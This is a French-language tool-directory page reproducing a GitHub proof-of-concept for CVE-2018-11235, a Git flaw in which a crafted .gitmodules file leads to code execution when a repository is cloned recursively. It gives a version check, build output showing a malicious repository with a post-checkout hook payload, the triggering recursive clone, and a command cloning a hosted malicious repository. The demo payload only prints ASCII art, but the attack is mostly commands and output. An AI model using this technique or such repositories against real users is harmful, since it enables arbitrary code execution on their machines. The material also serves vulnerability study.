Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-11235 — CVE-2018-11235(PoC && Exp) | Kitploit
Outils/GitHubGitHub/anonymking/cve-2018-11235
Analyse des VulnérabilitésExploitationSécurité de la Chaîne LogistiqueApprentissage et ÉducationExploitation de BinairesLabs et Pratique
GitHubanonymking/cve-2018-11235

CVE-2018-11235

CVE-2018-11235(PoC && Exp)

Voir le dépôt
1il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-11235

Aperçu de la vulnérabilité

  • Nom de la vulnérabilité : Vulnérabilité de sécurité Git
  • Identifiant CNNVD : CNNVD-201805-1020
  • Niveau de gravité : Élevé
  • Identifiant CVE : CVE-2018-11235
  • Type de vulnérabilité : Problème de caractéristique de sécurité
  • Date de publication : 2018-05-31
  • Type de menace : À distance
  • Date de mise à jour : 2019-04-01
  • Éditeur : git-scm
  • Source de la vulnérabilité :
  • Description de la vulnérabilité : Git est un système de contrôle de version distribué gratuit et open source développé par le développeur de logiciels américain Linus Torvalds. Une vulnérabilité de sécurité existe dans Git. Cette vulnérabilité provient du fait que, lors de l'ajout du nom d'un sous-module dans le répertoire $GIT_DIR/modules, le programme ne valide pas correctement le nom du sous-module provenant d'un fichier .gitmodules non fiable. Un attaquant distant peut exploiter cette vulnérabilité en utilisant un fichier .gitmodules spécialement conçu pour exécuter du code arbitraire. Les versions suivantes sont concernées : versions antérieures à Git 2.13.7, versions 2.14.x antérieures à 2.14.4, versions 2.15.x antérieures à 2.15.2, versions 2.16.x antérieures à 2.16.4, versions 2.17.x antérieures à 2.17.1.
  • Versions affectées (source : « Détection et correction de la vulnérabilité d'exécution de code arbitraire dans Git (CVE-2018-11235) ») :
root@kitploit:~
Version 2.13.x, inférieure à 2.13.7 : vulnérable
Version 2.14.x, inférieure à 2.14.4 : vulnérable
Version 2.15.x, inférieure à 2.15.2 : vulnérable
Version 2.16.x, inférieure à 2.16.4 : vulnérable
Version 2.17.x, inférieure à 2.17.1 : vulnérable
  • Vérifier si votre version est affectée (source : « Détection et correction de la vulnérabilité d'exécution de code arbitraire dans Git (CVE-2018-11235) ») :
root@kitploit:~
mkdir tmp && cd tmp
git init test && cd test && git update-index --add --cacheinfo 120000,e69de29bb2d1d6434b8b29ae775ad8c2e48c5391,.gitmodules
  1. Si le message affiché est Initialized empty Git repository in /tmp/test/.git/, la vulnérabilité est présente.
  2. Si les messages suivants s'affichent, la version n'est pas affectée :
root@kitploit:~
Initialized empty Git repository in /tmp/test/.git/
error: Invalid path '.gitmodules'
fatal: git update-index: --cacheinfo cannot add .gitmodules

Reproduction de la vulnérabilité

  • En raison des mécanismes de sécurité de GitHub, il n'est pas possible de télécharger un projet malveillant. Vous pouvez donc exécuter le script build.sh pour construire localement ce projet et l'étudier.
  • La réalisation de ce projet s'inspire principalement des deux projets CVE-2018-11235-DEMO et CVE-2018-11235
  • La version de Git que j'utilise est git-2.12.1
  • Processus et résultat :
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule/.git/
[master (root-commit) 9bb1fad] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/payload'...
done.
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/Submodule'...
done.
[master (root-commit) fcbf40f] CVE-2018-11235
 29 files changed, 560 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 Submodule
 create mode 100644 modules/1/2/3/4/payload/HEAD
 create mode 100644 modules/1/2/3/4/payload/config
 create mode 100644 modules/1/2/3/4/payload/description
 create mode 100755 modules/1/2/3/4/payload/hooks/applypatch-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/commit-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/post-checkout
 create mode 100755 modules/1/2/3/4/payload/hooks/post-update.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-applypatch.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-commit.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-push.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-rebase.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-receive.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/prepare-commit-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/update.sample
 create mode 100644 modules/1/2/3/4/payload/index
 create mode 100644 modules/1/2/3/4/payload/info/exclude
 create mode 100644 modules/1/2/3/4/payload/logs/HEAD
 create mode 100644 modules/1/2/3/4/payload/logs/refs/heads/master
 create mode 100644 modules/1/2/3/4/payload/logs/refs/remotes/origin/HEAD
 create mode 100644 modules/1/2/3/4/payload/objects/0e/6d9b98b3face913a8ebf48f804d6c8fffba674
 create mode 100644 modules/1/2/3/4/payload/objects/9b/b1fad6c6e16340496f2cc0fec46c8159bfc693
 create mode 100644 modules/1/2/3/4/payload/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391
 create mode 100644 modules/1/2/3/4/payload/packed-refs
 create mode 100644 modules/1/2/3/4/payload/refs/heads/master
 create mode 100644 modules/1/2/3/4/payload/refs/remotes/origin/HEAD
 create mode 120000 modules/payload
 create mode 160000 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" des_dir
[anonymking@localhost test]$ 
[anonymking@localhost test]$ 
[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" test
Cloning into 'test'...
done.
Submodule 'Submodule' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'Submodule'
Submodule '../../modules/payload' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'payload'
Cloning into '/home/anonymking/Desktop/test/test/Submodule'...
done.
Submodule path 'Submodule': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Submodule path 'payload': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'
  • Le code malveillant que j'ai construit dans le payload se contente d'afficher un Bouddha ; donc voir le Bouddha signifie que le test a réussi.

Références

  1. http://lkml.iu.edu/hypermail/linux/kernel/1805.3/05909.html
  2. https://www.anquanke.com/post/id/146909
  3. https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/
  4. https://xz.aliyun.com/t/2371
  5. https://github.com/CHYbeta/CVE-2018-11235-DEMO
  6. https://atorralba.github.io/CVE-2018-11235/
  7. https://github.com/Rogdham/CVE-2018-11235

Découverte inattendue

  • J'ai réussi à construire ce projet sur Coding — CVE-2018-11235
  • Méthode d'utilisation :
root@kitploit:~
git clone --recursive https://git.dev.tencent.com/anonymking/CVE-2018-11235.git test
Télécharger l’outil